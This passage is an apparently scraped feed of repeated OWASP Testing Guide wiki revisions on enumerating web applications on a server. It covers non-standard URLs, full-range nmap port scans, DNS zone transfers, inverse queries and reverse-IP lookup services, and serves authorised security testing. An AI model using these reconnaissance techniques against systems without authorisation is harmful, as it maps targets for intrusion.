&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11869</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11869"/>
				<updated>2006-11-06T13:08:29Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Note&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap –P0 –sT –sV –p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11832</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11832"/>
				<updated>2006-11-06T09:02:49Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap –P0 –sT –sV –p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. Actually, matters get complicated because there could be many such servers. Maybe you know a name server because it was given as part of the target to be assessed (let it be ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, you may get back a list of the DNS entries for domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
